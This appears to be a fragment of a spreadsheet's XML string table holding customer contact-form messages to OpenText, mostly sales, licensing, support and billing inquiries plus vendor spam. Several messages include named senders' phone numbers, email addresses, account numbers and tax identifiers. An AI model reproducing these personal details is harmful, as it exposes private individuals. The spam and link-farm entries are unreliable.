    <t>I am planning to attend the DF120 course in the near-term.  Please provide details on locations surrounding the Washington, DC area for this course.  I will be commuting from the Annapolis, MD area.</t>
  </si>
  <si>
    <t>We are a current customer for an E-Fax solution (Right Fax). We are seeking to move to a cloud service and would like to determine if you offer such a service.</t>
  </si>
  <si>
    <t>We recently sold your product to a costumer. The product quit working within a couple of months. The unit is getting power, but does not turn on. Date sold was 5/5/2018. Date returned to us on 8/20/2018.  Looking to get it replaced under 1 year warranty.</t>
  </si>
  <si>
    <t>Please provide the export control classification number (ECCN) and any export license exceptions that have been applied to the DM Server version 5.0</t>
  </si>
  <si>
    <t>fill out our vendor readiness form</t>
  </si>
  <si>
    <t xml:space="preserve">Please email me a copy of your Company's W-9 Form as soon as possible.  We have an outstanding invoice to pay, but are unable to process with the W-9 Form._x000D_
Thanks_x000D_
Maureen_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Evaluation of next version of global Electronic Records Management </t>
  </si>
  <si>
    <t>I would like to speak with someone about our Easylink, now OpenText, account.  Currently, we utilize the toolset to translate faxes into emails and I would like to better understand the logic built into the tool and how much flexibility we may have with the subject lines in the emails.  I look forward to hearing from a representative soon.  Thanks!</t>
  </si>
  <si>
    <t>Hi, we're currently looking at alternative to our thunderhead/Smartcomm offer.  would it be possible for someone to get in contact to obtain an indicative quote for build, setup &amp; migration with year one costs, and year 2-5 costs as well? Thanks</t>
  </si>
  <si>
    <t>We have a NY-based global distribution client interested in B2B, probably Managed Services, offerings.  Please contact me as soon as practicable to discuss integrations with Oracle Cloud systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  _x000D_
 _x000D_
I’m Bert and I’m reaching out to check if you are interested in acquiring “Legal Professionals contact database” with verified direct emails. _x000D_
 		_x000D_
If this is within your interest, please reach us with Target industry; Job titles and Geography; to get quote and sample contacts._x000D_
	_x000D_
Thanks,_x000D_
Bert Connell_x000D_
We respect your privacy. If you want to stop receiving emails from us please send a reply with the subject line as "leave out" _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a document management solution. </t>
  </si>
  <si>
    <t>Hey I wants to use Open text desktop viewer for viewing the .smf format files I have. It will be really very helpful if I get the trial version of the viewer.</t>
  </si>
  <si>
    <t>This is Ken from Formosa IT department. We recently took over the phone system and we found out that we have the rightfax server. I was wondering if we have the support from you guys. If we have, can I have the contact information?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ken</t>
  </si>
  <si>
    <t xml:space="preserve">Have a NPO client in TX  that wants a cloud based fax service that is also on the TX DIR. I understand that open text might just fit that bill. </t>
  </si>
  <si>
    <t xml:space="preserve">My name is Joseph Gugumuck and I work for FDIC procurement and we are looking for a POC to provide FDIC a budgetary estimate, for the following items:_x000D_
_x000D_
Guidance Software_x000D_
 EnCase Forensic, 7 Network Licenses_x000D_
_x000D_
Be advised this is for market research purposes only. FDIC will initiate the official procurement for this renewal. _x000D_
_x000D_
Please note: FDIC has new procurement requirements. Manufacturers and Vendors are required to provide Federal Government Terms and Conditions and/or Federal Government Compliant End User Licensing Agreements. Include with the budgetary estimate or indicate your Terms and EULAs are not designated federally compliant. Please forward any applicable compliance documents (e.g., VPAT, TAA, EULA, T&amp;Cs, etc.) with the budgetary estimate or indicate your Terms and EULAs are not designated federally compliant._x000D_
_x000D_
Feel free to contact me if you have any questions my direct number is 703-516-1167_x000D_
</t>
  </si>
  <si>
    <t>I have a Professional Annual Subscription to Hightail which costs me £119.99 yearly._x000D_
Hightail has apparently become opentext but there is no link from the Hightail log-in page._x000D_
My Hightail log in details don't work with opentext. I urgently need to use the professional service I have paid for, and am being seriously delayed by this error._x000D_
Please tell me how to log into and use the service I have paid for.</t>
  </si>
  <si>
    <t>Please provide me your email address</t>
  </si>
  <si>
    <t>Our company have bought some Brava-desktop(SKU-CXL), but now we don't know how to download and install it._x000D_
1, I'm one of the user of this software, but the contact person of our company is one of the IT member. If so, can i download it by myself? Or it only can be downloaded by the contact person?_x000D_
2, Do we need to apply  a &lt;My Account&gt;, then to download it?_x000D_
3, When apply the &lt;My Account&gt;, the website request to input &lt;Product Line(required)&gt;, &lt;End user number&gt;, &lt;Name of co-worker&gt;, &lt;System ID/Serial Number/PIN/VPS&gt;, What's these information? Do you have a procedure to introduce about download and installation which can be shared with me?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
we need an invoice for six licenses of Brava! Desktop TX IGC463981 according to the following invoice:_x000D_
_x000D_
Billing Doc. #: 9000602263_x000D_
Invoice Date : 2018-06-26_x000D_
Due Date: 2018-07-26_x000D_
GST#: 80361 5467 RT00_x000D_
EIN# 46-0525483_x000D_
_x000D_
You can contact me via email._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Julian Geber</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are a small size Reinsurance Brokerage firm situated in Beirut Lebanon and we are interested to acquire your special software that would transfer our work to 'Paperless' environment._x000D_
Please let us know whether you have a contact locally in order for us to proceed further._x000D_
Thanks,_x000D_
George</t>
  </si>
  <si>
    <t xml:space="preserve">Issue raised on 07.08.2018 and no response received;- see below_x000D_
 - We have been using the Fax2Mail software for some time._x000D_
_x000D_
Last week one of my colleagues had an error message when trying to send a fax.  She logged a support call, please see attached._x000D_
The response advised that she should use a different portal than the one we have been using for some time._x000D_
_x000D_
Can you please confirm whether old portal is supported?_x000D_
_x000D_
Additionally, when accessing via the new portal, my colleague has been unable to download a copy of the document that has been faxed – error message is ‘XOAService Error’.  Can you please advise what needs to happen to ensure that documents can be viewed._x000D_
_x000D_
Many thanks_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I just tried to sign in to my Hightail account (which used the same email address as the one above) and got the message that Hightail is now opentext with a blank page, and not even a link to get to opentext. Anyway when I looked opentext up I can't sign in to an opentext account._x000D_
So I'm left wondering....what's the deal? _x000D_
Have I now lost my account and all the folders of content uploaded to Hightail in the past? _x000D_
Regards,_x000D_
Lucy Willy</t>
  </si>
  <si>
    <t>Need the details on speech analytics</t>
  </si>
  <si>
    <t>Partnership Inquiry</t>
  </si>
  <si>
    <t>We are Providing Security Services &amp; Housekeeping Services Supply Manpower also. We are Giving Best quality &amp; Best Price. Thanking you</t>
  </si>
  <si>
    <t>Could you please send us a demo video and the information of the quoted price.</t>
  </si>
  <si>
    <t>Hi, I need a high tail account for a major bank. The sign up account page doesn't work, and just says "Hightail is now Open text." Cheers,_x000D_
Alana</t>
  </si>
  <si>
    <t>i want release note via mail</t>
  </si>
  <si>
    <t>i want all release note via email</t>
  </si>
  <si>
    <t>RightFax 10.6 Windows 10 1803 support</t>
  </si>
  <si>
    <t>Hello from Shaun Butterworth,_x000D_
 _x000D_
I would like to check with you to see whether you would like a Cleaning Service Estimate from our company?_x000D_
 _x000D_
Thank you,_x000D_
Shaun Butterworth_x000D_
Stratus Building Solutions</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
 _x000D_
wir sind einer der führenden Software-Distributoren/Reseller in Deutschland, Österreich und der Schweiz, und sind seit 1987 fest am Markt etabliert. Unser Hauptsitz ist in Augsburg, weitere Niederlassungen haben wir in Herrenberg und Frauenfeld. Europaweit betreuen wir unsere Kunden sowohl im B2B-Bereich als auch direkt. _x000D_
 _x000D_
Können Sie uns bitte für einen unserer Kunden ein Angebot inklusive Listpreisen, Artikelnummern und unserem Rabatt für folgende Anfrage zukommen lassen:_x000D_
 _x000D_
Menge: 1_x000D_
Produkt: OpenText Host Explorer_x000D_
 _x000D_
Lizenznehmer:_x000D_
Wurde uns leider nicht angegeben _x000D_
 _x000D_
Bitte antworten Sie ebenso auf die untenstehenden Fragen. _x000D_
Diese muss nur einmalig ausgefüllt werden, damit wir diese Eckdaten in unserem System vermerken können._x000D_
 _x000D_
	Wie wird Ihre Software nach dem Kauf lizensiert?        _x000D_
	In welchen Sprachen ist die Software verfügbar? Und wie sind die Systemanforderungen?        _x000D_
	Sind Support und Wartung obligatorisch zur Lizenz?  _x000D_
	Falls ja, verlängert sich die Wartung automatisch?_x000D_
	Ist eine elektronische Lieferung möglich?        _x000D_
_x000D_
	Volumenrabatt?        _x000D_
	Wiederverkaufsrabatt?        _x000D_
	Wie erfolgt der Bestellvorgang für Reseller?        _x000D_
_x000D_
	Versandart?        _x000D_
	Lieferzeit?_x000D_
 _x000D_
 _x000D_
Vielen Dank im Voraus._x000D_
_x000D_
Mit freundlichen Grüssen _x000D_
  _x000D_
Sophie Nehk 	 	 	 _x000D_
Sourcing Specialist 	 	 	 _x000D_
snehk@sos-software.com _x000D_
 	 	 _x000D_
Telefon DE: +49 7032 81461–63 	 	Telefon CH: +41 52 72807-38 	 _x000D_
———————————————————————————————————————————————————— _x000D_
 	 	 	 _x000D_
SOS Software Service GmbH 	 	SOS Software Service AG 	 _x000D_
Unterer Talweg 40 – 86179 Augsburg 	 	Bahnhofplatz 65 – 8500 Frauenfeld 	 _x000D_
DEUTSCHLAND 	 	SCHWEIZ 	 _x000D_
———————————————————————————————————————————————————— _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>RE: Error in your Website_x000D_
_x000D_
Hello,_x000D_
_x000D_
My name is Tracy and I am a Digital Marketing Specialists for a Creative Agency._x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
After closer inspection it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_
_x000D_
I can send you over the report which shows all of the above and so much more which will help you at least improve your site, its rankings and traffic._x000D_
I would love the chance to help as well however; this report will at least give you a gauge on the quality of what I do.  If you are interested then please share your requirement and contact details._x000D_
_x000D_
Is this the best email to send it to?_x000D_
_x000D_
Sincerely,_x000D_
Tracy Jackson_x000D_
tracywebseomarketing@gmail.com_x000D_
_x000D_
Please let me know if we can discuss this_x000D_
_x000D_
Thanks_x000D_
Tracy Jackson_x000D_
tracywebseomarketing@gmail.com</t>
  </si>
  <si>
    <t>Researching RightFAX solution for a banking customer needing an eFAX solution.  Need to schedule a call.</t>
  </si>
  <si>
    <t>Interested in RightFax Connect to support new DR solution</t>
  </si>
  <si>
    <t>I would like to know the licensing methodology that is used for Exceed TurboX and Exceed On Demand (annual or permanent?), and the per license or per seat cost for both respective solutions. I cannot find this information on your website, which is a bit of a head-scratcher..._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">I am Dinesh a Business Analyst at Red Bull North America._x000D_
_x000D_
We are currently in the process of re-visiting our eDiscovery legal/IT processes and add partners to provide the technology solutions._x000D_
_x000D_
We will be doing the RFP process to select the vendor and plan to release it in the next couple of weeks._x000D_
_x000D_
I am reaching out today to get the contact information of the individual who will be able to represent Guidance/enCase to discuss options further._x000D_
_x000D_
Please let me know when you get a chance._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we currently have a patient in our hospital that is covered by your insurance and would like some details </t>
  </si>
  <si>
    <t>When trying to put in a support ticket and I receive the registration confirmation, it sends me to a loop.  I need the ability to enter in service tickets.  What is the process that needs to happen._x000D_
_x000D_
Thanks, Robin</t>
  </si>
  <si>
    <t>I like to know more about OpenText Web Experience Management. What is the recommended infrastructure to run WEM? Can I run WEM using AWS infrastructure? I like to create a scalable cloud implementation of WEM (autoscaling). Is it possible? Can I run WEM over kubernetes?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Julio.</t>
  </si>
  <si>
    <t xml:space="preserve">I bought the program but I cant figure out how to download it and get it to work.  I can't understand your instructions.  Is there some better instructions?_x000D_
</t>
  </si>
  <si>
    <t>I want to start a new project</t>
  </si>
  <si>
    <t>We are using AppXtender to store images . We are using a old version of the software and using SAP .Net connector to connect to SAP which is unsupported now. We want to talk to someone from your group and want to understand  the option to switch to web services or any other options. Can you please direct me to the right group who can help with this?</t>
  </si>
  <si>
    <t xml:space="preserve">We've lost our prior rep who would log into GXS to update our Macy's catalog, and I don't know how to recover her log in to add new items. Could someone help me? _x000D_
Thank you! </t>
  </si>
  <si>
    <t xml:space="preserve">I have 2 accounts (084906-001 &amp; 085340-001) with Open text, I want to set up online access &amp; enroll with credit card payment options. please provide instructions, thanks. </t>
  </si>
  <si>
    <t xml:space="preserve">Need to discuss options for eFax solution for our company.  </t>
  </si>
  <si>
    <t xml:space="preserve">Have tried multiple times calling and cannot get through to speak with anyone nor can leave a voicemail. I am trying to acquire brava for 4 computers but dont know which one is the one that I need._x000D_
_x000D_
I really need someone to get back to me asap as to phone system/service being inconsistent and non cooperative._x000D_
_x000D_
Thank you._x000D_
_x000D_
Jeff </t>
  </si>
  <si>
    <t>I'm reaching out regarding AI World 2018 this Dec 3-5 in Boston focused on the business and technology of enterprise AI and Machine Learning.  I'm hoping to connect with your marketing team to see if you would be interested in sponsoring or exhibiting opportunities._x000D_
Thanks!</t>
  </si>
  <si>
    <t>Please email me a copy of your latest W9 so that I can update our AP payment system._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Matt</t>
  </si>
  <si>
    <t>We are looking into possible solutions for an accounts payable workflow need for JD Edwards EnterpriseOne 9.2</t>
  </si>
  <si>
    <t>Need licensing costs per month, per user for Content Suite 16</t>
  </si>
  <si>
    <t>We have a number of agreements with OpenText (LiveLink, etc.) but I'm not sure if any of our agreements will cover the installation of Opentext Windows Viewer v10.0.</t>
  </si>
  <si>
    <t>I'm looking for a fax to email service for infrequent personal use. I used and administered easylink at my previous employer (Paragon Bank, Raleigh NC), so am familiar with the service. Is there an option suitable for infrequent personal use?</t>
  </si>
  <si>
    <t>Hello, Could I please get an email address for sending future purchase orders._x000D_
We are currently updating our system to have these sent via email only. Thank you</t>
  </si>
  <si>
    <t>We are working with customer whom want to integrate Opentext Applications to SAP, we are looking for installation manuals for the following products (or more recent versions):_x000D_
1. OpenText Invoice Capture Center (ICC)_x000D_
+Application: ICC 7.5 SP6 (also called Business Content Center)_x000D_
2. Archive Server_x000D_
+Application: Archive Center 16.2 (former OpenText Archive Server)</t>
  </si>
  <si>
    <t>Hi, I previously contacted OpenText requesting for "Employment Verification" letter on a letterhead, deadline for submission is very close, if I miss this then I have to restart the process again for which anyway I need employment verification letter from OpenText. I've worked with Cordys (2010-2012) which was later acquired by OpenText. My attorney has asked me to get two letters _x000D_
a) Sign on Employment verification letter from my supervisor(bsanthan@) _x000D_
b) Sign from HR - about the Cordys acquisition date and my employment date confirmation on letter with a "letterhead"._x000D_
_x000D_
Your help on this would be very highly appreciated as I've been following up on this for multiple days._x000D_
_x000D_
Thanks,_x000D_
Anantha Krishnan</t>
  </si>
  <si>
    <t>_x000D_
Is it possible to download the openText content server evaluation?_x000D_
I am currently using KOFAX Express with CaptureBite,_x000D_
I want to analyze the option to use OpentText</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
_x000D_
Hope you are having a good day!_x000D_
_x000D_
Would you be interested in acquiring decision makers prospect list for your sales/marketing campaigns? We specialize in building custom leads lists across all Industry segments in the US and worldwide. _x000D_
_x000D_
I would be happy to send you few samples and data benefits based on your requirement if you can share your current database and customer requirements in the below format:_x000D_
_x000D_
Target Industry:  ___________(Manufacturing, Retail, Healthcare, IT, Pharma, Oil &amp; Gas, etc.)_x000D_
Target Geography: __________(US, UK,UAE, Australia etc.)_x000D_
Target Job Title:  ___________(CEO, CFO, CTO, VP/Director, etc.)_x000D_
_x000D_
Looking forward to your prompt response._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to learn more about your EDI Services and packages and Pricing </t>
  </si>
  <si>
    <t xml:space="preserve">I need to have someone contact us so we can pay our current invoice. We need an updated vendor form due to your name change but we don't have a rep name or contact info. </t>
  </si>
  <si>
    <t>Buen día, el motivo de la presente es para solicitarle me sea comunicado si alguno de las descripciones corresponde a alguno de los productos o servicios que su empresa brinda o presta:_x000D_
_x000D_
ITEM 1_x000D_
_x000D_
* Procesador Intel® E5-2697v4, frecuencia básica 2,3 Ghz, turbo speed 3,6 Ghz, 18 cores, sistema de refrigeración liquido_x000D_
* Chipsets North Bridge Intel® C612 PCH X-99  _x000D_
* Memoria RAM 256GB (16 x 16GB) ECC DDR4 2400 Mhz, máximum memory 1Tb_x000D_
* OS Drive 512GB SATA 6Gb/s M.2 SSD_x000D_
* Temp Drive 1 x 512GB SATA 6Gb/s SSD_x000D_
* Storage RAID 3 x 8TB SATA 6Gb/s Hard Drive_x000D_
* Sistema operativo Windows 10 Professional 64 bit_x000D_
* Software preinstalado: SIM Analysis Tool HTCI_SIM, Cell Phone Management DART-Eval Copy_x000D_
* Monitor 30 Inch LED Monitor 2560x1600 (HDMI, DVI-D, VGA, mDP, DP, 2x USB 3.0_x000D_
* Tarjeta de video 6GB GDDR5, PCI-e Interface 3.0 16x, puertos HDMI, DVI, 3 PUERTOS DP (Display Port)_x000D_
* 6 Expansion Slots PCIe 3.0_x000D_
* Puertos USB: 2 USB 2.0, 6 USB 3.0 (2 Top Mounted, 4 Front Mounted), 1 eSATA, 2 Front Audio (Headphone and Microphone), 1 Top Mounted SATA Dock for 3.5 &amp; 2.5 Inch Drives_x000D_
* Front Mounted Bays: Tableau T356789iu (USB 3.0 / SATA / IDE / SAS / FW 800 / PCI), Hard Drive Cooling Bay, Blu-Ray Burner Drive with Lightscribe, 2 Temp/Cache/Active Evidence 2.5" SATA, 4 Front I/O Panel  Port USB 3.0 Panel, Write Blocked Multi-Card Reader , SAS / SATA Hot-Plug Trayless Bay (10 x 3.5")._x000D_
* Internal I/O Connectors: 1 USB 2.0 connector(s) support(s) additional 2 USB 2.0 port(s), 2 USB 3.0 connector(s) support(s) additional 4 USB 3.0 port(s) (19-pin)._x000D_
* System Dimensions: Width 9.06 Inches, Height 24.33 Inches, Depth 26.10 Inches, Weight 65+ Pounds._x000D_
* Power Supply Maximum Wattage 1300 Watts, 80 Plus Certification 80 Plus Gold Certified, Modular Fully Modular Power Supply_x000D_
* Onboard LAN Chipset Intel® I210-AT, 2 x Gigabit LAN Controller(s) (10/100/1000Mbps)_x000D_
* Rear Panel Ports: 1 PS/2 keyboard/mouse combo port(s), 2 LAN (RJ45) ports, 4 USB 2.0, 6 USB 3.0, 1 S/PDIF Out optical out</t>
  </si>
  <si>
    <t>Applying for open positions, interested to join open text</t>
  </si>
  <si>
    <t>Senden Sie mir bitte den Download Link für die Trailsoftware_x000D_
Opentext Exceed Terminal Emulation V15_x000D_
Vielen Dank im Voraus</t>
  </si>
  <si>
    <t>evaluating document management solutions - I'm familiar with iManage which was used at my prior employer.</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
I am conducting some pre-employment screening on a candidate who used to work for Open Text (Asia) Pte Ltd in Singapore, is there a HR email adress where we could send a reference request to?_x000D_
_x000D_
Kindest Regards,_x000D_
_x000D_
Lisa</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
aktuell nutzen wir Content Server 10.5 on-premise bei uns im Hause. Soweit ich verstanden habe, ist das Produkt Content Suite Platform Cloud Edition das Äquivalent in der Cloud._x000D_
_x000D_
Können Sie mir bzgl. des Pricings weiterhelfen?_x000D_
Gibt es eine Übersicht, was die einzelnen Produkte, welche man aus der Cloud beziehen kann kosten?_x000D_
_x000D_
Viele Grüße,_x000D_
Peter Bartosinski</t>
  </si>
  <si>
    <t>Datenschutzgrundverordnung: Können Sie uns bitte Ihre Vereinbarung über eine Auftragsverarbeitung zukommen lassen._x000D_
_x000D_
Vielen Dank im Voraus</t>
  </si>
  <si>
    <t xml:space="preserve">Hello_x000D_
As Burroughs Procurement Manager, I need an email to contact about Royalties Burroughs needs to pay related to Middleware SW._x000D_
Please reach out to me about this_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>We have RightFax in the organization and we would like to implement RightFax with PeopleSoft Financials.  We would like to get information on how to proceed and if any addition items are needed.</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
_x000D_
I would like to check on the implementation process for the Opentext eDocs and the training provided after that.</t>
  </si>
  <si>
    <t>Request for meeting with our Director at Montreal, Canada</t>
  </si>
  <si>
    <t>License Encase SAFE for use in Migration</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to invite Opentext to quote on a document review exercise that we are setting up. I would be grateful if a member of the team could contact me at the above number to discuss as soon as possible._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We can put your website on 1st page of Google to drive relevant traffic to your site. Let us know if you would be interested in getting detailed proposal. We can also schedule a call &amp; will be pleased to explain our services in detail. We look forward to hearing from you soon. Thanks!</t>
  </si>
  <si>
    <t>AMC Renewal - Please contact soon</t>
  </si>
  <si>
    <t>Cancelation request send in October 2017</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
von 03/1999 bis 06/2005 war ich bei der IXOS AG im technischen Support tätig._x000D_
In dieser Zeit wurde zur privaten Altersvorsorge die IXOS Unterstütungskasse e.V. gegründet, über die in Form von Gehaltsumwandlungen individuelle Rücklagen zur Altersvorsorge gebildet wurden._x000D_
Leider finde ich keine aktuellen Kontaktdaten der IXOS Unterstützungskasse e.V._x000D_
Ich hoffe, Sie können mir weiter helfen und mir die Kontaktdaten zukommen lassen - vielen Dank!_x000D_
_x000D_
Freundliche Grüße_x000D_
Andreas Neuhoff_x000D_
</t>
  </si>
  <si>
    <t>just want to know the current price of SQLBASE EDK  per user. What is the minimum purchase quantity</t>
  </si>
  <si>
    <t xml:space="preserve">How do we become a reseller of your product?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Please allow me to get to support according to Adecco Contract._x000D_
Thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve">I would need support and KB portal access </t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global Digital Forensics Software Market Size and Analysis - Forecasts to 2025._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report._x000D_
_x000D_
_x000D_
_x000D_
Best Regards!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>my password isnt working and wont let me reset to a new password</t>
  </si>
  <si>
    <t>Hi, I am working on an internal research study where I need to evaluate different data archiving solutions. I need some information about the capabilities of OpenText InfoArchive solution. Is it just a utility that assists in archiving data or provides an end-to-end data archival i.e. reads data from source, sends it to the storage where it will be archived and provided storage facility too.</t>
  </si>
  <si>
    <t>We would like to consider using BIRT (Open source or Designer Professional) to achieve our report generation needs. We need to be able to connect to MariaDB and Hadoop cluster via Impala. The problem we have not is we cannot authenticate using hive jdbc, as our Hadoop cluster is using Kerberos keytab authentication. Is there any way to do that?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for options to virtualize RightFax and/or develop a DR solution which does not require telephony connections or fax boards.  </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=https://сихем.рф/proektirovanie-kottedzhej-krasnoyarsk-abakan]Проектирование коттеджей Красноярск, Абакан[/url]  - подробнее на сайте алмазного бурения [url=https://сихем.рф/]сихем.рф[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I ma a hightail customer and I cannot access my account for receipt </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am updating my email contact list and noticed that Shawn McCreight's email bounced back. Are you able to verify whether he still works at the Pasadena office?_x000D_
_x000D_
Thank you, </t>
  </si>
  <si>
    <t xml:space="preserve">I see that Open Text Announces New Products (cloud-based EIM application)For Legal Tech Market, I’m reaching out to communicate about “ Legal Professionals &amp; Legal Software Users “ Contacts that can be used as a multi-channel marketing file for email campaigns, Telemarketing, cold calling, fax marketing &amp; Direct marketing. The contact base includes all data fields like company name, first name, last name, designation, phone number, fax number, email address, SIC codes, Industry, etc._x000D_
_x000D_
The contacts are from the following criteria:_x000D_
Small and medium-sized firms_x000D_
Law Firms &amp; Legal Professionals : - Solo law firms, Boutique law firm, Full-service law firms, Attorney and Lawyers from: - Attorney, Outside counsel, In-house counsel, Plaintiff &amp; Defense Attorneys Partner_x000D_
Office Practice, Litigators, Trial attorneys, CIO/CFO (C-Level), VPs, Directors, Manager, IT Professionals, Paralegals &amp; Litigation Support Managers, HR Directors / Managers and other professionals._x000D_
_x000D_
Legal Software Users:-  _x000D_
_x000D_
LexisNexis, Rocket Matter, Abacus Law_x000D_
Clio, Case Tracker Law, Lexical, Lawcus_x000D_
DPS Software, SharePoint, Sage Timeslips etc._x000D_
_x000D_
Is this something that you could be interested in? _x000D_
_x000D_
Do keep me posted on if and how we can take this forward or if you are looking for any other data based on Geography, Titles, and Industry. _x000D_
_x000D_
Cheers!!! Looking forward._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">SAP solution being one of your specialty, how about acquiring business contacts of SAP Users and Key Professionals to showcase your advanced technologies, valuable services, and unique expertise?_x000D_
_x000D_
Our pilot team has compiled a list of contacts from SAP Users and Key Professionals with entire business details you might require for your Demand generation, Tele-calling, Campaign etc._x000D_
_x000D_
Few Users Specifications: _x000D_
_x000D_
ERP &amp; CRM_x000D_
SuccessFactors_x000D_
BusinessObjects BI_x000D_
HANA_x000D_
S/4HANA_x000D_
BW/4HANA_x000D_
Hybris_x000D_
Concur_x000D_
_x000D_
The contacts are from the following criteria:_x000D_
_x000D_
Management/Business Team                                    : - CIO, COO, CSO, CTO, VP, HR Professionals, Partner Alliance Manager_x000D_
Business Intelligence                                                    : - BI Administrator/Consultant/Development Manager, Business Analyst/Business Consultant, Report Designer/Developer_x000D_
Business Process Analyst                                             :-  Business Process Architect/Designer/Developer/Expert/Manager_x000D_
Database Management and Administration        :-  DB Administrator, DB Architect, DB Designer, DB Developer_x000D_
IT Management, Architecture, and Design           : - Analyst, Architect, Change Manager, Consulting Manager, ERP Manager, Implementation Consultant, IT Manager, QA Analyst/QA Engineer, Solution Consultant_x000D_
                     Technical Architect/Consultant/Sales Engineer/Support/Trainer_x000D_
System Administration and Security                       : - Admin, App Admin, Basis Admin, Business Security Expert, SAP Net Weaver Admin, Security Consultant/Manager, Solution Admin, System Admin/Analyst/Engineer_x000D_
_x000D_
If you are interested in acquiring the same, please revert me and I would provide you with more information on counts, cost and the quality of our data._x000D_
_x000D_
NOTE: We can also provide you the database of your Competitors/Any Technology or Software Users as per your Specification._x000D_
_x000D_
Waiting for your swift response._x000D_
</t>
  </si>
  <si>
    <t>I need to talk with someone regarding integration of a Right Fax server and multiple Xerox VersaLink devices. 727-612-2925. Thanks!</t>
  </si>
  <si>
    <t>This is a test!</t>
  </si>
  <si>
    <t>I would like to make a appointment to show my collections, I use to sell to Stein Marts a few years ago my product preformed very well . I am relaunching my brand LOU NARDI again, after living and working out of Shanghai for 12 years and moving back to the USA. Please tell me how make appointment to come to your company to show my new 2019 collections. Thank you Lou Nardi                    Dresses, and related separates</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,  _x000D_
 _x000D_
I’m Bert and I’m reaching out to check if you are interested in acquiring “Legal IT Professionals contact database” with verified direct emails. _x000D_
 		_x000D_
If this is within your interest, please reach us with Target industry; Job titles and Geography; to get quote and sample contacts._x000D_
	_x000D_
Thanks,_x000D_
Bert Connell_x000D_
We respect your privacy. If you want to stop receiving emails from us please send a reply with the subject line as "leave out" _x000D_
</t>
  </si>
  <si>
    <t>Looking for rough estimate of pricing for Digital Asset Management. Need asap</t>
  </si>
  <si>
    <t>I need to view the installation guide and documents in the Knowledge Center.  We are upgrading to 7.5 and the latest support pack very soon.  In fact, the project has already started.  Shauna Rapp is ;my manager here at Cott (Refresco) in Tampa, Florida._x000D_
_x000D_
Can you please give me access to the Knowledge Center?_x000D_
_x000D_
Thanks and regards,_x000D_
Judy Ortscheid</t>
  </si>
  <si>
    <t>would like to speak to sales representative about Open Text Records Management for our organization.</t>
  </si>
  <si>
    <t>need W9 form to set up as new vendor</t>
  </si>
  <si>
    <t>Hi, Could you recommend which forums that I could join for EnCase.  I am starting out with EnCase software and would sometimes have questions that may be considered as beginner questions and would appreciate some help.  Thank you for your help</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for documentation on your advanced web services for RightFax. Once I have reviewed that documentation, I might be interested in speaking to folks on your end. Thanks, </t>
  </si>
  <si>
    <t>Interested in DAM solutions, including Media Management, MediaBin and/or full content suite.</t>
  </si>
  <si>
    <t>Hello - Could you please send an outstanding invoice report to my email address for Anika Therapeutics?  We are trying to obtain an invoice from your Company that we have had difficulty obtaining.  A collection agency called us about one of them but we would prefer to pay you directly.  Thanks,_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>We are moving to industry specific ERP system (Firestream Ascend) and want to discuss capabilities and pricing of RightFax._x000D_
_x000D_
Additional questions..._x000D_
1.) What data format is needed from Ascend?_x000D_
2.) How does RightFax get the data from Ascend?</t>
  </si>
  <si>
    <t>I wish to discuss upgrading from an older version of ApplicationExtender to the latest version.  I'm also willing to discuss other potential upgrade or migration paths.</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag,_x000D_
ich habe eine Frage zu dem Office Editor aus der Content Server Lösung: ist die Nutzung des Office Editors über die Content Server Lizenz abgedeckt oder ist die Office Editor Nutzung separat lizenzpflichtig? Des Weiteren würde ich gerne wissen ob die Client Software lauffähig ist auf Windows 10._x000D_
Vielen Dank vorab.  </t>
  </si>
  <si>
    <t>Looking to contract Gxs mailbox to comunicate  with partners using ANSI X 12 files</t>
  </si>
  <si>
    <t>I have the product Teleform Desktop.  It is on a computer that we can no longer use.  I have the serial number to use, but I need to be able to download it on another computer.</t>
  </si>
  <si>
